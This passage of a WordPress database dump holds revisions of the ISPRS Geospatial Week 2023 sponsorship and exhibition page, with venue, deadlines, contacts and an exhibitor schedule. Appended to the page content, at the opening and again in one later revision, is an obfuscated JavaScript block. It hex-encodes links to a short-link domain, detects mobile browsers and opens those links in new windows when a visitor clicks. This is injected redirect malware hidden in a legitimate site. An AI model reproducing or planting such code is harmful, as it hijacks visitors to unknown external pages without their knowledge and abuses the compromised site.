Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','SPONSORSHIP AND EXHIBITION','','inherit','closed','closed','','2920-revision-v1','','','2023-02-04 06:17:25','2023-02-04 06:17:25','',2920,'https://gsw2023.com/?p=3755',0,'revision','',0),
(3756,1,'2023-02-04 06:18:27','2023-02-04 06:18:27','<p>[vc_row][vc_column][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><strong>ISPRS GEOSPATIAL WEEK 2023</strong></h3>\n<h3 style=\"text-align: center;\"><strong>SPONSORSHIP AND EXHIBITION - Cairo – Egypt 2-7 September 2023</strong></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]The Arab Academy for Science, Science, and Maritime Transport as the ISPRS GSW2023 organizer would like to invite you to participate as a sponsor / exhibitor at the Geospatial Week 2023, which will be held in Cairo, Egypt on 2-7 September 2023.</p>\n<p>&nbsp;</p>\n<p>The Geospatial Week is an internationally renowned scientific event held once every two years. The event is organized by the International Society of Photogrammetry and Remote Sensing (ISPRS) to bring together expertise in the fields of photogrammetry, remote sensing, and geospatial information science. Some 1000 to 2000 researchers and professionals from around the world gathered for an entire week to share new findings and experiences through a series</p>\n<p>of dedicated workshops. More information regarding ISPRS can be found at:</p>\n<h5><u><a href=\"https://www.isprs.org/\">-www.isprs.org.</a></u></h5>\n<h5></h5>\n<p>-An exhibition will also be held during the conference. This provides companies in the field with the opportunity to be involved and showcase their products, services, and expertise to an international audience. As a professional, you also get the chance to attend the presentations and follow the latest scientific developments in the field. Conference attendees are free to wander around the exhibition area during the workshops, coffee and lunch breaks. Participants can register for any number of days.</p>\n<p>&nbsp;</p>\n<p>-A number of sponsorship and exhibition packages are available. Tailor-made options are also available, interested companies to contact the GSW Director Prof. Naser El-Sheimy at <u><a href=\"mailto:elsheimy@ucalgary.ca\">elsheimy@ucalgary.ca</a></u> or Prof. Amr Hanafi at <u><a href=\"mailto:amrhali@feng.bu.edu.eg\">amrhali@feng.bu.edu.eg</a></u> or Prof Alaa Abd El Bary <u><a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a></u> for more details on the sponsorship opportunities for the GSW/2023.</p>\n<p>&nbsp;</p>\n<p>-We hope you will consider the opportunity to participate at the ISPRS Geospatial Week 2023 and look forward to meeting you in Cairo!</p>\n<h5></h5>\n<p>The GSW2023 Organizing Committee.[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"chino\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h4><strong>SPONSORSHIP AND EXHIBITION PACKAGES</strong></h4>\n<p><span style=\"font-size: 12pt;\">Sponsorship options include the opportunity to give oral presentations about your company’s products, exhibition booths, live demonstrations and the ability to give a half-day interactive tutorial of your software or product on Sunday. More information regarding the various packages and additional à la carte options is given below. If you would like to discuss other sponsorship options or tailor-made packages, please contact the GSW Director Prof. Naser El- Sheimy at <u><a href=\"mailto:elsheimy@ucalgary.ca\">elsheimy@ucalgary.ca</a></u> or Prof. Amr Hanafi at <u><a href=\"mailto:amrhali@feng.bu.edu.eg\">amrhali@feng.bu.edu.eg</a></u> or Prof Alaa Abd El Bary <u><a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a></u> or <u><a href=\"mailto:info@gsw2023.com\">info@gsw2023.com</a></u> .</span>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"3654\" img_size=\"1600x2000\"][vc_column_text]</p>\n<h5><strong>Please note that there is a 10% discount for ISPRS Sustaining Members.</strong></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner][vc_column_text]</p>\n<h5><strong>Venue - INTERCONTINENTAL  CAIRO SEMIRAMIS</strong></h5>\n<p>(<u>https:/<a href=\"http://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc\">/www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc</a></u>)</p>\n<p><span style=\"font-size: 12pt;\">The GSW2023 will take place on the historic Semiramis hotel site, guests can enjoy modern luxury on the River Nile. This Cairo hotel features a rooftop pool, fine dining with exquisite cuisine for every taste, conference facilities, a state-of-the-art Spa, a shopping arcade, with the Nile Terrace offering stunning views of the sunset over the Nile. Located at a premium location in the heart of the city center, the hotel offers complimentary WIFI and is located next to the Egyptian Museum and bazaars of old Cairo.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"2936\" img_size=\"1000x500\" alignment=\"center\" onclick=\"zoom\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5>SPONSORSHIP TIMETABLE AND DEADLINES</h5>\n<p><strong>Upon registration, the sponsor’s logo and level of support will be published on the GSW2023 website.</strong></p>\n<p>&nbsp;</p>\n<ul>\n<li><strong>March 1, 2023 Deadline for sponsorship confirmation and payment</strong></li>\n<li><strong>June 1, 2013 Delivery of sponsorship material to be included in conference bags to:</strong></li>\n</ul>\n<p>&nbsp;</p>\n<h5>The Arab Academy for Science, Science, and Maritime Transport</h5>\n<h6><strong>Office of the Vice President of the Academy for Graduate Studies and Scientific Research</strong></h6>\n<h5></h5>\n<h5><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5><strong>Tel :(+203) 5497598</strong></h5>\n<h5><b>Fax:(+203) <strong>5497598</strong></b></h5>\n<p>&nbsp;</p>\n<p><strong>Main Campus</strong></p>\n<p><strong> Alexandria, </strong><strong>Miami </strong><strong>Campus</strong></p>\n<p><strong>P.O. Box 1029 -Gamal Abdelnaser st. </strong><strong>-Miami </strong></p>\n<p><strong>Tel :(+203) 5565429/ 5506042</strong></p>\n<p><b>Fax:(+203) 5487786/ 5506042  </b></p>\n<p>&nbsp;</p>\n<p><strong>Alexandria, </strong><strong>Abu kir Campus</strong></p>\n<p><strong>Tel :(+203) 5622366/ 5622388</strong></p>\n<p><b>Fax:(+203) 5610950</b>[/vc_column_text][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][ultimate_info_table design_style=\"design04\" color_scheme=\"blue\" package_heading=\"CONFERENCE PROGRAM FOR EXHIBITORS\"]</p>\n<table>\n<tbody>\n<tr>\n<td width=\"170\">\n<h5><strong>September 2</strong></h5>\n</td>\n<td width=\"189\">\n<h5><strong>9:00 – 5:00</strong></h5>\n</td>\n<td width=\"217\">\n<h5><strong>Tutorial Day</strong></h5>\n<h5><strong>Exhibition Setup</strong></h5>\n</td>\n</tr>\n<tr>\n<td width=\"170\">\n<h5><strong>September 3</strong></h5>\n</td>\n<td width=\"189\">\n<h5></h5>\n<h5><strong>12:00-17:00</strong></h5>\n<h5><strong>18:00 – 20:00</strong></h5>\n</td>\n<td width=\"217\">\n<h5></h5>\n<h5><strong>Exhibition Opening</strong></h5>\n<h5><strong>Welcome Reception</strong></h5>\n</td>\n</tr>\n<tr>\n<td width=\"170\">\n<h5><strong>September 4</strong></h5>\n</td>\n<td width=\"189\">\n<h5></h5>\n<h5><strong>9:00 – 17:00</strong></h5>\n<h5><strong>18:00 – 20:00</strong></h5>\n</td>\n<td width=\"217\">\n<h5></h5>\n<h5><strong>Exhibition</strong></h5>\n<h5><strong>Exhibitors’ reception</strong></h5>\n</td>\n</tr>\n<tr>\n<td width=\"170\">\n<h5><strong>September 5</strong></h5>\n</td>\n<td width=\"189\">\n<h5></h5>\n<h5><strong>9:00 – 15:00</strong></h5>\n<h5><strong>15:00 – 18:00</strong></h5>\n</td>\n<td width=\"217\">\n<h5></h5>\n<h5><strong>Exhibition</strong></h5>\n<h5><strong>Dismantle Exhibition</strong></h5>\n</td>\n</tr>\n</tbody>\n</table>\n<p>[/ultimate_info_table][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][vc_column_text]<strong><span style=\"font-size: 12pt;\">The Organizing Committee reserves the right to change these times to better fit the final program if necessary. Allocation of the booths will be on a first-come-first-served basis upon receiving the confirmation and payment, with preference given to the companies who request multiple booths</span></strong></p>\n<p>&nbsp;</p>\n<h5><strong>INFORMATION</strong></h5>\n<p><strong>For more information visit the Geospatial Week 2023 website: www.gsw2023.com or contact<a href=\"mailto:elsheimy@ucalgary.ca\"> the organizing committee by mail (elsheimy@ucalgary.ca</a> or <u><a href=\"mailto:info@gsw2023.com\">info@gsw2023.com</a></u></strong> ).[/vc_column_text][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','SPONSORSHIP AND EXHIBITION','','inherit','closed','closed','','2920-revision-v1','','','2023-02-04 06:18:27','2023-02-04 06:18:27','',2920,'https://gsw2023.com/?p=3756',0,'revision','',0),
(3757,1,'2023-02-04 06:19:48','2023-02-04 06:19:48','[vc_row][vc_column][vc_column_text]\r\n<h3 style=\"text-align: center;\"><strong>ISPRS GEOSPATIAL WEEK 2023</strong></h3>\r\n<h3 style=\"text-align: center;\"><strong>SPONSORSHIP AND EXHIBITION - Cairo – Egypt 2-7 September 2023</strong></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]The Arab Academy for Science, Science, and Maritime Transport as the ISPRS GSW2023 organizer would like to invite you to participate as a sponsor / exhibitor at the Geospatial Week 2023, which will be held in Cairo, Egypt on 2-7 September 2023.\r\n\r\n&nbsp;\r\n\r\nThe Geospatial Week is an internationally renowned scientific event held once every two years. The event is organized by the International Society of Photogrammetry and Remote Sensing (ISPRS) to bring together expertise in the fields of photogrammetry, remote sensing, and geospatial information science. Some 1000 to 2000 researchers and professionals from around the world gathered for an entire week to share new findings and experiences through a series\r\n\r\nof dedicated workshops. More information regarding ISPRS can be found at:\r\n<h5><u><a href=\"https://www.isprs.org/\">-www.isprs.org.</a></u></h5>\r\n<h5></h5>\r\n-An exhibition will also be held during the conference. This provides companies in the field with the opportunity to be involved and showcase their products, services, and expertise to an international audience. As a professional, you also get the chance to attend the presentations and follow the latest scientific developments in the field. Conference attendees are free to wander around the exhibition area during the workshops, coffee and lunch breaks. Participants can register for any number of days.\r\n\r\n&nbsp;\r\n\r\n-A number of sponsorship and exhibition packages are available. Tailor-made options are also available, interested companies to contact the GSW Director Prof. Naser El-Sheimy at <u><a href=\"mailto:elsheimy@ucalgary.ca\">elsheimy@ucalgary.ca</a></u> or Prof. Amr Hanafi at <u><a href=\"mailto:amrhali@feng.bu.edu.eg\">amrhali@feng.bu.edu.eg</a></u> or Prof Alaa Abd El Bary <u><a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a></u> for more details on the sponsorship opportunities for the GSW/2023.\r\n\r\n&nbsp;\r\n\r\n-We hope you will consider the opportunity to participate at the ISPRS Geospatial Week 2023 and look forward to meeting you in Cairo!\r\n<h5></h5>\r\nThe GSW2023 Organizing Committee.[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"chino\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]\r\n<h4><strong>SPONSORSHIP AND EXHIBITION PACKAGES</strong></h4>\r\n<span style=\"font-size: 12pt;\">Sponsorship options include the opportunity to give oral presentations about your company’s products, exhibition booths, live demonstrations and the ability to give a half-day interactive tutorial of your software or product on Sunday. More information regarding the various packages and additional à la carte options is given below. If you would like to discuss other sponsorship options or tailor-made packages, please contact the GSW Director Prof. Naser El- Sheimy at <u><a href=\"mailto:elsheimy@ucalgary.ca\">elsheimy@ucalgary.ca</a></u> or Prof. Amr Hanafi at <u><a href=\"mailto:amrhali@feng.bu.edu.eg\">amrhali@feng.bu.edu.eg</a></u> or Prof Alaa Abd El Bary <u><a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a></u> or <u><a href=\"mailto:info@gsw2023.com\">info@gsw2023.com</a></u> .</span>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"3654\" img_size=\"1600x2000\"][vc_column_text]\r\n<h5><strong>Please note that there is a 10% discount for ISPRS Sustaining Members.</strong></h5>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner][vc_column_text]\r\n<h5><strong>Venue - INTERCONTINENTAL  CAIRO SEMIRAMIS</strong></h5>\r\n(<u>https:/<a href=\"http://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc\">/www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc</a></u>)\r\n\r\n<span style=\"font-size: 12pt;\">The GSW2023 will take place on the historic Semiramis hotel site, guests can enjoy modern luxury on the River Nile. This Cairo hotel features a rooftop pool, fine dining with exquisite cuisine for every taste, conference facilities, a state-of-the-art Spa, a shopping arcade, with the Nile Terrace offering stunning views of the sunset over the Nile. Located at a premium location in the heart of the city center, the hotel offers complimentary WIFI and is located next to the Egyptian Museum and bazaars of old Cairo.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"2936\" img_size=\"1000x500\" alignment=\"center\" onclick=\"zoom\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]\r\n<h5>SPONSORSHIP TIMETABLE AND DEADLINES</h5>\r\n<strong>Upon registration, the sponsor’s logo and level of support will be published on the GSW2023 website.</strong>\r\n\r\n&nbsp;\r\n<ul>\r\n 	<li><strong>March 1, 2023 Deadline for sponsorship confirmation and payment</strong></li>\r\n 	<li><strong>June 1, 2013 Delivery of sponsorship material to be included in conference bags to:</strong></li>\r\n</ul>\r\n&nbsp;\r\n<h5>The Arab Academy for Science, Science, and Maritime Transport</h5>\r\n<h6><strong>Office of the Vice President of the Academy for Graduate Studies and Scientific Research</strong></h6>\r\n<h5></h5>\r\n<h5><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5><b>Fax:(+203) <strong>5497598</strong></b></h5>\r\n&nbsp;\r\n\r\n<strong>Main Campus</strong>\r\n\r\n<strong> Alexandria, </strong><strong>Miami </strong><strong>Campus</strong>\r\n\r\n<strong>P.O. Box 1029 -Gamal Abdelnaser st. </strong><strong>-Miami </strong>\r\n\r\n<strong>Tel :(+203) 5565429/ 5506042</strong>\r\n\r\n<b>Fax:(+203) 5487786/ 5506042  </b>\r\n\r\n&nbsp;\r\n\r\n<strong>Alexandria, </strong><strong>Abu kir Campus</strong>\r\n\r\n<strong>Tel :(+203) 5622366/ 5622388</strong>\r\n\r\n<b>Fax:(+203) 5610950</b>[/vc_column_text][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][ultimate_info_table design_style=\"design04\" color_scheme=\"blue\" package_heading=\"CONFERENCE PROGRAM FOR EXHIBITORS\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"170\">\r\n<h5><strong>September 2</strong></h5>\r\n</td>\r\n<td width=\"189\">\r\n<h5><strong>9:00 – 5:00</strong></h5>\r\n</td>\r\n<td width=\"217\">\r\n<h5><strong>Tutorial Day</strong></h5>\r\n<h5><strong>Exhibition Setup</strong></h5>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">\r\n<h5><strong>September 3</strong></h5>\r\n</td>\r\n<td width=\"189\">\r\n<h5></h5>\r\n<h5><strong>12:00-17:00</strong></h5>\r\n<h5><strong>18:00 – 20:00</strong></h5>\r\n</td>\r\n<td width=\"217\">\r\n<h5></h5>\r\n<h5><strong>Exhibition Opening</strong></h5>\r\n<h5><strong>Welcome Reception</strong></h5>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">\r\n<h5><strong>September 4</strong></h5>\r\n</td>\r\n<td width=\"189\">\r\n<h5></h5>\r\n<h5><strong>9:00 – 17:00</strong></h5>\r\n<h5><strong>18:00 – 20:00</strong></h5>\r\n</td>\r\n<td width=\"217\">\r\n<h5></h5>\r\n<h5><strong>Exhibition</strong></h5>\r\n<h5><strong>Exhibitors’ 